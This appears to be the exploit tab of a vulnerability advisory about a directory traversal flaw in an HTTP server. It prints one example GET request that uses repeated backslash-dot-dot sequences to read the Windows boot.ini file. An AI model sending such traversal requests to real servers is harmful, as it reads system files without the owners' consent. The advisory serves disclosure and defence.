• info
• discussion
• exploit
• solution
• references

HTTP 1.1 GET Request Directory Traversal Vulnerability

An attacker can exploit this issue with a web browser.

The following example request is available:

GET /..\..\\..\..\\..\..\\..\..\\\boot.ini HTTP/1.0